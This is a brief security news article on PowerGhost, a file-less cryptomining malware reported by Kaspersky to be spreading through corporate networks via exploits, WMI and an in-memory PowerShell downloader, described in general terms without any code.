A new malware has been detected by the researchers of Kaspersky Labs. This malware is targeting and spreading on corporate networks in India, Brazil, Colombia, and Turkey very rapidly as per the report. Named as PowerGhost, it is a file-less malware that can stealthily get inside a system within a network and also spread onto other PCs of the organization’s server.
The malware uses the information and power of the systems that are infected to mine for the cryptocurrency. The infections are initiated through the use of remote administration tools or just plain exploits by the attackers and since it is file-less, it is not easily detected by the network making it even more complicated.
Geography of infections by the miner | Image Source: Kaspersky Lab
“The malicious program uses lots of file-less techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive,” stated securelist.
The complete technical description and more detailed report can be read at the
official blog.
This is a golden chance for hackers to affect the crypto-world and make big bucks. The malware is surely a severe problem and must be looked into by firms whose servers are at risk and should be dealt with before lasting damage is done.